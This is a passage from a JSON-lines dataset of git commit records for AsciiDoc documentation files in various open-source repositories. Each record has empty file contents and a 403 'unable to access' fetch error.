README.\n","repos":"larsbutler\/gophercloud,clintonskitson\/gophercloud,feiskyer\/gophercloud,timbyr\/gophercloud,rgbkrk\/gophercloud,clintonskitson\/gophercloud,dudymas\/gophercloud,trumant\/gophercloud,jamiehannaford\/gophercloud,DSpeichert\/gophercloud,larsbutler\/gophercloud,pratikmallya\/gophercloud,dudymas\/gophercloud,jarosser06\/gophercloud,rackspace\/gophercloud,trumant\/gophercloud,DSpeichert\/gophercloud,rackspace\/gophercloud,rgbkrk\/gophercloud,jarosser06\/gophercloud,feiskyer\/gophercloud,carolynvs\/gophercloud,pratikmallya\/gophercloud,mitchellh\/gophercloud-fork-40444fb,carolynvs\/gophercloud,sti-jans\/gophercloud,timbyr\/gophercloud,jamiehannaford\/gophercloud,sti-jans\/gophercloud,mitchellh\/gophercloud-fork-40444fb","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clintonskitson\/gophercloud.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4aed388980b606e6bb1ffedaa0e1d28dc7438cf5","subject":"Update readme - release instructions might have been wrong w.r.t archive generation. 
#263","message":"Update readme - release instructions might have been wrong w.r.t archive generation. #263\n","repos":"mike-tr-adamson\/incubator-tinkerpop,jorgebay\/tinkerpop,velo\/incubator-tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,PommeVerte\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,robertdale\/tinkerpop,n-tran\/incubator-tinkerpop,edgarRd\/incubator-tinkerpop,newkek\/incubator-tinkerpop,velo\/incubator-tinkerpop,artem-aliev\/tinkerpop,apache\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,RedSeal-co\/incubator-tinkerpop,krlohnes\/tinkerpop,apache\/incubator-tinkerpop,BrynCooke\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,newkek\/incubator-tinkerpop,krlohnes\/tinkerpop,apache\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,apache\/tinkerpop,samiunn\/incubator-tinkerpop,artem-aliev\/tinkerpop,gdelafosse\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,jorgebay\/tinkerpop,apache\/tinkerpop,dalaro\/incubator-tinkerpop,dalaro\/incubator-tinkerpop,dalaro\/incubator-tinkerpop,apache\/tinkerpop,velo\/incubator-tinkerpop,n-tran\/incubator-tinkerpop,n-tran\/incubator-tinkerpop,Lab41\/tinkerpop3,apache\/tinkerpop,pluradj\/incubator-tinkerpop,apache\/tinkerpop,apache\/tinkerpop,edgarRd\/incubator-tinkerpop,RedSeal-co\/incubator-tinkerpop,edgarRd\/incubator-tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,gdelafosse\/incubator-tinkerpop,krlohnes\/tinkerpop,RussellSpitzer\/incubator-tinkerpop,RussellSpitzer\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,krlohnes\/tinkerpop,jorgebay\/tinkerpop,artem-aliev\/tinkerpop,PommeVerte\/incubator-tinkerpop,BrynCooke\/incubator-tinkerpop,apache\/tinkerpop,artem-aliev\/tinkerpop,gdelafosse\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,RedSeal-co\/incubator-tinkerpop,mpollmeier\/tinkerpop3,rmagen\/incubator-tinkerpop,artem-aliev\/tinkerpop,vtslab\/incubator-tinkerpop,mpollmeier\/tinkerpop3,Lab41\/tinkerpop3,rmagen\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,jorgebay\/tinkerpop,RussellSpitzer\/incubator-tinkerpop,PommeVerte\/incubator-tinkerpop,BrynCooke\/incubator-tinkerpop,rmagen\/incubator-tinkerpop,newkek\/incubator-tinkerpop,robertdale\/tinkerpop","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jorgebay\/tinkerpop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1cab70f2eae767bda0c55c1e9c62826087b3ae50","subject":"touchup on README.asciidoc to tickle a build","message":"touchup on README.asciidoc to tickle a build","repos":"araisrobo\/machinekit,strahlex\/machinekit,strahlex\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit,mhaberler\/machinekit,strahlex\/machinekit,araisrobo\/machinekit,mhaberler\/machinekit,araisrobo\/machinekit,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,mhaberler\/machinekit,mhaberler\/machinekit,araisrobo\/machinekit,strahlex\/machinekit,mhaberler\/machinekit,araisrobo\/machinekit,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,araisrobo\/machinekit,mhaberler\/machinekit,strahlex\/machinekit,strahlex\/machinekit,mhaberler\/machinekit,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,mhaberler\/machinekit,strahlex\/machinekit,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,araisrobo\/machinekit","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/araisrobo\/machinekit.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} 
{"commit":"9548a8b7f70037c0eb248b2fd239cc2c41a9f774","subject":"Added a README file.","message":"Added a README file.\n","repos":"lento\/cortex,hradec\/cortex,davidsminor\/cortex,danieldresser\/cortex,davidsminor\/cortex,danieldresser\/cortex,lento\/cortex,davidsminor\/cortex,hradec\/cortex,appleseedhq\/cortex,davidsminor\/cortex,hradec\/cortex,lento\/cortex,goddardl\/cortex,danieldresser\/cortex,appleseedhq\/cortex,appleseedhq\/cortex,danieldresser\/cortex,goddardl\/cortex,goddardl\/cortex","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/davidsminor\/cortex.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"03e7f15d3d1dcea70dd6b0510754ef622d72260c","subject":"Add CI badge","message":"Add CI badge\n","repos":"NetcomKassel\/sinatra-swagger-exposer,archiloque\/sinatra-swagger-exposer,NetcomKassel\/sinatra-swagger-exposer","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NetcomKassel\/sinatra-swagger-exposer.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3eda99ac4f978b799edeb213c9d7f79b7f4ccc2","subject":"readme update","message":"readme update\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,inserpio\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,atuljangra\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/inserpio\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"87154f4a39c77ab92d80f3effa58de3000921127","subject":"[docs] Add admin workflow for recovering from disk failure","message":"[docs] Add admin workflow for recovering from disk failure\n\nI didn't document how to rebalance tablets onto the repaired tserver if\nnecessary, since the process is complicated and error prone, and we hope\nto have a rebalancing tool in the future. 
These docs will quickly become\noutdated when KUDU-616 is fixed, but I think it's worth it to document\nsince we frequently receive questions on the topic.\n\nChange-Id: I6541bffc5e9546c523df610fd8c025dd05e403bf\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/6606\nTested-by: Kudu Jenkins\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nReviewed-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\n","repos":"cloudera\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b4e48ba6a2e308346c07e95b079075b302661206","subject":"Add PBR article part one","message":"Add PBR article part one","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/pbr_part1.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/pbr_part1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"94774a9bff77b7726c212f27b7ff250310a60db9","subject":"Updated documentation","message":"Updated documentation\n","repos":"ronsmits\/markup-document-builder,Swagger2Markup\/markup-document-builder,johanhammar\/markup-document-builder","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ronsmits\/markup-document-builder.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4b0a2dc649c61ce2e7de0a155b766c67acbcbf68","subject":"Fixes to the documentation based on the PR review","message":"Fixes to the documentation based on the PR review\n","repos":"r0h4n\/node-agent,Tendrl\/node_agent,Tendrl\/node-agent,Tendrl\/node-agent,Tendrl\/node_agent,r0h4n\/node-agent,r0h4n\/node-agent,Tendrl\/node-agent","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/r0h4n\/node-agent.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"c184400dee0008be7eecad62e0fdb709527aa003","subject":"added readme","message":"added readme\n","repos":"sdaschner\/asciiblog,sdaschner\/asciiblog","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/sdaschner\/asciiblog.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b094518986b78e92a5d2ea8b453bb911dd484b9f","subject":"added readme","message":"added readme\n","repos":"arun-gupta\/snoop,arun-gupta\/snoop,ivargrimstad\/snoopee,arun-gupta\/snoop,ivargrimstad\/snoop,ivargrimstad\/snoopee,ivargrimstad\/snoop,ivargrimstad\/snoopee,ivargrimstad\/snoop","old_file":"snoop-eureka\/README.adoc","new_file":"snoop-eureka\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivargrimstad\/snoopee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52d92f507447f0a417d61d2512e3284345aa1bef","subject":"y2b create post Android vs iPhone vs YOU","message":"y2b create post Android vs iPhone vs YOU","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-09-Android-vs-iPhone-vs-YOU.adoc","new_file":"_posts\/2013-09-09-Android-vs-iPhone-vs-YOU.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0ad50365eac26a2744f57646c6575d4ff28288f","subject":"Some rewording. Remove the excerpt from standalone.xml","message":"Some rewording. Remove the excerpt from standalone.xml\n","repos":"jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,jsanda\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/installation.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5c036096d5e59dbf439086f7046a0ff3417b0462","subject":"Update 2016-07-01-Reading-Between-The-Bits.adoc","message":"Update 2016-07-01-Reading-Between-The-Bits.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-01-Reading-Between-The-Bits.adoc","new_file":"_posts\/2016-07-01-Reading-Between-The-Bits.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"c6f52802e696a2ba34e26fb784ec70c3fbd59430","subject":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","message":"Update 2017-02-03-Azure-Machine-Learning-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_file":"_posts\/2017-02-03-Azure-Machine-Learning-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fb72f7a6b75524db09cb1f0c9ef9dfcc04c86b61","subject":"Update 2016-01-26-Puzzle-6-Hackipedia.adoc","message":"Update 2016-01-26-Puzzle-6-Hackipedia.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"_posts\/2016-01-26-Puzzle-6-Hackipedia.adoc","new_file":"_posts\/2016-01-26-Puzzle-6-Hackipedia.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e96dc1c5ad3bc950ac034b156d5ef896e55eb04","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c779490a09611dc100e10a94aa8faee42276b1b","subject":"Update 2017-03-19-ui-layouts-no-nativescript.adoc","message":"Update 2017-03-19-ui-layouts-no-nativescript.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-03-19-ui-layouts-no-nativescript.adoc","new_file":"_posts\/2017-03-19-ui-layouts-no-nativescript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a963850ea75310f225afd795b8ef6599ce9df018","subject":"Update 2016-11-20-The-Importance-of-Research.adoc","message":"Update 2016-11-20-The-Importance-of-Research.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0ab9386462f77a9dae2ddeb2a5ef3feb5a8fffb","subject":"Update 
2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","message":"Update 2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","new_file":"_posts\/2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2de9489ca7825769055753f74d10612ca1e1b790","subject":"Update 2017-12-17-Masonry-at-the-Speed-of-Light.adoc","message":"Update 2017-12-17-Masonry-at-the-Speed-of-Light.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-12-17-Masonry-at-the-Speed-of-Light.adoc","new_file":"_posts\/2017-12-17-Masonry-at-the-Speed-of-Light.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6634ae0ca2c57bc09c74394874ccebc4c224d615","subject":"Update CONTRIBUTING.adoc","message":"Update CONTRIBUTING.adoc\n\nAdd download step","repos":"HyunsooKim1112\/origin,smarterclayton\/origin,barrett-vegas-com\/origin,akram\/origin,codificat\/origin,wanghaoran1988\/origin,ravisantoshgudimetla\/origin,linzhaoming\/origin,mjisyang\/origin,linux-on-ibm-z\/origin,jwforres\/origin,childsb\/origin,liangxia\/origin,mfojtik\/origin,bowenha2\/origin,allevo\/origin,liggitt\/origin,tagoh\/origin,linux-on-ibm-z\/origin,jwhonce\/origin,thesteve0\/origin,mkumatag\/origin,stefwalter\/origin,tjcunliffe\/origin,ingvagabund\/origin,dcrisan\/origin,lixueclaire\/origin,ramr\/origin,zofuthan\/origin,sdodson\/origin,rrati\/origin,nak3\/origin,levivic\/origin,burmanm\/origin,maleck13\/origin,kargakis\/origin,lorenzogm\/openshift-origin,matthyx\/origin,kargakis\/origin,jdnieto\/origin,ocsbrandon\/origin,aveshagarwal\/origin,linearregression\/origin,Jandersolutions\/origin,danwinship\/origin,hingstarne\/origin,nak3\/origin,ocsbrandon\/origin,gashcrumb\/origin,ncdc\/origin,rhamilto\/origin,sdminonne\/origin,marsmensch\/atomic-enterprise,rootfs\/origin,marun\/origin,ravisantoshgudimetla\/origin,markllama\/atomic-enterprise,chmouel\/origin,wjiangjay\/origin,tiwillia\/origin,asiainfoLDP\/datafactory,romanbartl\/origin,tnguyen-rh\/origin,imcsk8\/origin,allevo\/origin,Tlacenka\/origin,smunilla\/origin,markllama\/atomic-enterprise,spinolacastro\/origin,tnozicka\/origin,imcsk8\/origin,jhammant\/origin,mingderwang\/origin,stevekuznetsov\/origin,tdawson\/origin,Tlacenka\/origin,spinolacastro\/origin,gruiz17\/origin,danmcp\/origin,aveshagarwal\/origin,myfear\/origin,Jandersoft\/origin,pgmcd\/origin,rajkotecha\/origin,childsb\/origin,sgallagher\/origin,dkorn\/origin,dcbw\/origin,rajatchopra\/origin,westmisfit\/origin,tnozicka\/origin,maleck13\/origin,adelton\/origin,zofuthan\/origin,sspeiche\/origin,spadgett\/origin,levivic\/origin,PI-Victor\/origin,markllama\/origin,projectatomic\/atomic-enterprise,tiwillia\/origin,pmorie\/origin,levivic\/orig
in,tnguyen-rh\/origin,maxamillion\/origin,bowenha2\/origin,jdnieto\/origin,adelton\/origin,pombredanne\/atomic-enterprise,coreydaley\/origin,Jandersoft\/origin,adelton\/origin,thesteve0\/origin,sallyom\/origin,domenicbove\/origin,gashcrumb\/origin,ncdc\/origin,jhammant\/origin,willmtemple\/origin,yepengxj\/df,pacoja84\/origin,janetkuo\/origin,bparees\/origin,xuant\/origin,grdryn\/origin,juanvallejo\/origin,miminar\/atomic-enterprise,enj\/origin,xuant\/origin,arilivigni\/origin,sg00dwin\/origin,simo5\/origin,samsong8610\/origin,ryanj\/origin,tracyrankin\/origin,stackdocker\/origin,chlunde\/origin,gabemontero\/origin,stefwalter\/origin,myfear\/origin,smarterclayton\/origin,jupierce\/origin,mrogers950\/origin,YannMoisan\/origin,xiuwang\/origin,quantiply-fork\/origin,pacoja84\/origin,dmage\/origin,seveillac\/origin,dobbymoodge\/origin,spinolacastro\/origin,nitintutlani\/origin,vongalpha\/origin,dustintownsend\/origin,wanghaoran1988\/origin,barrett-vegas-com\/origin,lixueclaire\/origin,rhcarvalho\/origin,sspeiche\/origin,tiwillia\/origin,luciddreamz\/origin,myfear\/origin,gruiz17\/origin,westmisfit\/origin,wyue-redhat\/origin,aweiteka\/origin,mahak\/origin,abutcher\/origin,craigmunro\/origin,wanghaoran1988\/atomic-enterprise,mdshuai\/origin,ryanj\/origin,joshuawilson\/origin,christian-posta\/origin,greyfairer\/openshift-origin,php-coder\/origin,y0no\/origin,projectatomic\/atomic-enterprise,ocsbrandon\/origin,christian-posta\/origin,lixueclaire\/origin,jsafrane\/origin,janetkuo\/origin,craigmunro\/origin,mjisyang\/origin,tnozicka\/origin,wjiangjay\/origin,PI-Victor\/origin,jhammant\/origin,mkumatag\/origin,yarko\/origin,stefwalter\/origin,pravisankar\/origin,wjiangjay\/origin,marsmensch\/atomic-enterprise,mkumatag\/origin,zofuthan\/origin,wjiangjay\/origin,pecameron\/origin,rusenask\/origin,rajkotecha\/origin,biyiklioglu\/origin,csrwng\/origin,ejemba\/origin,akram\/origin,nhr\/origin,bowenha2\/origin,mnagy\/origin,rootfs\/origin,dcbw\/origin,hferentschik\/origin,Jandersolutions\/origin,jprukner\/origin,goern\/origin,greyfairer\/openshift-origin,smarterclayton\/origin,quantiply-fork\/origin,Tlacenka\/origin,aweiteka\/origin,EricMountain-1A\/openshift-origin,pkdevbox\/origin,jprukner\/origin,sdminonne\/origin,ironcladlou\/origin,chmouel\/origin,yarko\/origin,dinhxuanvu\/origin,adietish\/origin,spohnan\/origin,zhaosijun\/origin,louyihua\/origin,derekwaynecarr\/origin,fabianofranz\/origin,senayar\/origin,gabemontero\/origin,pravisankar\/origin,jeffvance\/origin,liggitt\/origin,smunilla\/origin,goern\/origin,mahak\/origin,rhamilto\/origin,wanghaoran1988\/atomic-enterprise,abutcher\/origin,moolitayer\/origin,danmcp\/origin,yarko\/origin,rhuss\/origin,pweil-\/origin,danmcp\/origin,legionus\/origin,gruiz17\/origin,sg00dwin\/origin,mfisher-rht\/origin,jupierce\/origin,tjcunliffe\/origin,pkdevbox\/origin,wyue-redhat\/origin,fabianofranz\/origin,zhaosijun\/origin,pgmcd\/origin,dcbw\/origin,ashcrow\/origin,wanghaoran1988\/atomic-enterprise,christian-posta\/origin,mdshuai\/origin,jeffvance\/origin,php-coder\/origin,mfisher-rht\/origin,craigmunro\/origin,dcrisan\/origin,dinhxuanvu\/origin,linux-on-ibm-z\/origin,anpingli\/origin,luciddreamz\/origin,tjanez\/origin,zofuthan\/origin,y0no\/origin,spinolacastro\/origin,mnagy\/origin,rrati\/origin,dgoodwin\/origin,Tlacenka\/origin,barrett-vegas-com\/origin,php-coder\/origin,pravisankar\/origin,sferich888\/origin,yepengxj\/df,jwforres\/origin,tjanez\/origin,Jandersoft\/origin,ironcladlou\/origin,openshift\/origin,jhammant\/origin,mdshuai\/origin,rajatchopra\/origin,jp
rukner\/origin,dustintownsend\/origin,projectatomic\/atomic-enterprise,spohnan\/origin,levivic\/origin,oybed\/origin,dmage\/origin,zofuthan\/origin,vongalpha\/origin,markllama\/origin,maxamillion\/origin,elyscape\/origin,mfisher-rht\/origin,anpingli\/origin,tnguyen-rh\/origin,rootfs\/origin,nhr\/origin,ravisantoshgudimetla\/origin,xuant\/origin,domenicbove\/origin,miminar\/atomic-enterprise,seveillac\/origin,marun\/origin,moolitayer\/origin,adietish\/origin,barrett-vegas-com\/origin,dgoodwin\/origin,tiwillia\/origin,detiber\/origin,adietish\/origin,miminar\/origin,rhcarvalho\/origin,chlunde\/origin,eparis\/origin,jwhonce\/origin,linux-on-ibm-z\/origin,wyue-redhat\/origin,rajatchopra\/origin,arilivigni\/origin,jhadvig\/origin,jwhonce\/origin,samsong8610\/origin,YannMoisan\/origin,pweil-\/origin,romanbartl\/origin,rhuss\/origin,linzhaoming\/origin,swizzley\/origin,hingstarne\/origin,ingvagabund\/origin,ncdc\/origin,tdawson\/origin,dustintownsend\/origin,burmanm\/origin,elyscape\/origin,moolitayer\/origin,simo5\/origin,dcbw\/origin,EricMountain-1A\/openshift-origin,tjcunliffe\/origin,pravisankar\/origin,senayar\/origin,pkdevbox\/origin,simo5\/origin,benjaminapetersen\/origin,sspeiche\/origin,Miciah\/origin,juanvallejo\/origin,sseago\/origin,Nick-Harvey\/origin,danwinship\/origin,benjaminapetersen\/origin,robertol\/origin,swizzley\/origin,nhr\/origin,php-coder\/origin,php-coder\/origin,burmanm\/origin,EricMountain-1A\/openshift-origin,jhadvig\/origin,mingderwang\/origin,wyue-redhat\/origin,deads2k\/origin,myfear\/origin,ibotty\/origin,rafabene\/origin,derekwaynecarr\/origin,Jandersolutions\/origin,codificat\/origin,dkorn\/origin,miminar\/atomic-enterprise,jhadvig\/origin,pombredanne\/atomic-enterprise,grdryn\/origin,rrati\/origin,smunilla\/origin,jpeeler\/origin,sspeiche\/origin,kargakis\/origin,ramr\/origin,adietish\/origin,tjanez\/origin,seveillac\/origin,joshuawilson\/origin,janetkuo\/origin,Nick-Harvey\/origin,dkorn\/origin,pmorie\/origin,yarko\/origin,adietish\/origin,grdryn\/origin,dustintownsend\/origin,spohnan\/origin,danwinship\/origin,knobunc\/origin,mfojtik\/origin,levivic\/origin,Tlacenka\/origin,tnguyen-rh\/origin,HyunsooKim1112\/origin,ramr\/origin,fkirill\/origin,sdodson\/origin,grdryn\/origin,imcsk8\/origin,mrogers950\/origin,elyscape\/origin,biyiklioglu\/origin,dcrisan\/origin,romanbartl\/origin,ryanj\/origin,rusenask\/origin,deads2k\/origin,rrati\/origin,mrogers950\/origin,legionus\/origin,thesteve0\/origin,domenicbove\/origin,xuant\/origin,cgwalters\/origin,y0no\/origin,lixueclaire\/origin,jim-minter\/origin,markllama\/origin,wyue-redhat\/origin,eparis\/origin,sg00dwin\/origin,knobunc\/origin,rhamilto\/origin,biyiklioglu\/origin,linearregression\/origin,markllama\/atomic-enterprise,jeremyeder\/origin,biyiklioglu\/origin,imcsk8\/origin,rhamilto\/origin,mrogers950\/origin,maxamillion\/origin,thesteve0\/origin,fkirill\/origin,lorenzogm\/openshift-origin,Nick-Harvey\/origin,dinhxuanvu\/origin,linzhaoming\/origin,quantiply-fork\/origin,dobbymoodge\/origin,maleck13\/origin,pgmcd\/origin,childsb\/origin,sallyom\/origin,PI-Victor\/origin,westmisfit\/origin,detiber\/origin,PI-Victor\/origin,goern\/origin,rafabene\/origin,jeremyeder\/origin,dobbymoodge\/origin,imcsk8\/origin,linearregressi